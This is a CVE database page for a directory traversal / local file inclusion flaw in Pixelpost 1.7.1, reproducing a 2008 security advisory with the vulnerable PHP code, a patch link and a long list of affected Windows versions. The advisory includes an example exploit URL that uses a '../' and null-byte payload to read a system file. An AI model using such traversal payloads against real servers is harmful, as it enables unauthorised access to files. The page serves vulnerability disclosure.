CVE-2008-3365
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Directory traversal vulnerability in index.php in Pixelpost 1.7.1 on Windows, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language_full parameter.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 6150
Publication date : 2008-07-27 22h00 +00:00
Author : DSecRG
EDB Verified : Yes
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-033
Application: Pixelpost photoblog
Versions Affected: 1.7.1
Vendor URL: http://www.pixelpost.org/
Bug: Local File Include
Exploits: YES
Reported: 22.07.2008
Vendor response: 23.07.2008
Solution: YES
Date of Public Advisory: 28.07.2008
Authors: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
Description
***********
Pixelpost photoblog has local file include vulnerability in script index.php
Successful exploitation requires that "register_globals" is enabled.
Code
****
#################################################
$PP_supp_lang = array('dutch'=>array('NL','Nederlands'),
'english'=>array('EN','English'),
'french'=>array('FR','Francais'),
'german'=>array('DE','Deutsch'),
'italian'=>array('IT','Italiano'),
'norwegian'=>array('NO','Norsk'),
'persian'=>array('FA','Farsi'),
'polish'=>array('PL','Polskiego'),
'portuguese'=>array('PT','Portugues'),
'simplified_chinese'=>array('CN','Chinese'),
'spanish'=>array('ES','Espanol'),
'swedish'=>array('SE','Svenska'),
'danish'=>array('DK','Dansk'),
'japanese'=>array('JP','Japanese'),
'hungarian'=>array('HU','Magyar'),
'romanian'=>array('RO','Romana'),
'russian'=>array('RU','Russian'),
'czech'=>array('CS','Cesky')
);
...
if(isset($_GET['lang'])) { $language_abr = substr($_GET['lang'],0,2); }
foreach ($PP_supp_lang as $key => $row) {
foreach($row as $cell){
if ($cell == strtoupper($language_abr)) { $language_full = $key; }
}
}
...
if(!empty($language_full)) {
if(file_exists("language/lang-".$language_full.".php")) {
if( !isset($_GET['x'])OR($_GET['x'] != "rss" & $_GET['x'] != "atom")) {
require("language/lang-".$language_full.".php");
}
}else{
...
#################################################
Example:
http://[server]/[installdir]/index.php?lang=DSecRG&language_full=../../../../../../../../../../../../../boot.ini%00
Solution
********
Vendor fix this flaw on 27.07.2008. Security Patch can be downloaded here:
http://www.pixelpost.org/blog/2008/07/27/pixelpost-171-security-patch/
About
*****
Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
# milw0rm.com [2008-07-28]
Products Mentioned
Configuraton 0
Microsoft>>Windows >> Version 3.1
- Microsoft>>Windows >> Version 3.1 (Open CPE detail)
Microsoft>>Windows-nt >> Version 95
Microsoft>>Windows-nt >> Version 98
Microsoft>>Windows-nt >> Version 2008
- Microsoft>>Windows-nt >> Version 2008 (Open CPE detail)
Microsoft>>Windows-nt >> Version me
Microsoft>>Windows_2000 >> Version *
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version beta3 (Open CPE detail)
Microsoft>>Windows_2003_server >> Version *
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
- Microsoft>>Windows_2003_server >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version *
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version *
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version sp2 (Open CPE detail)
- Microsoft>>Windows_xp >> Version sp3 (Open CPE detail)
- Microsoft>>Windows_xp >> Version sp3 (Open CPE detail)
- Microsoft>>Windows_xp >> Version unknown (Open CPE detail)
Pixelpost>>Pixelpost >> Version 1.7.1
References
http://www.securityfocus.com/archive/1/494817/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
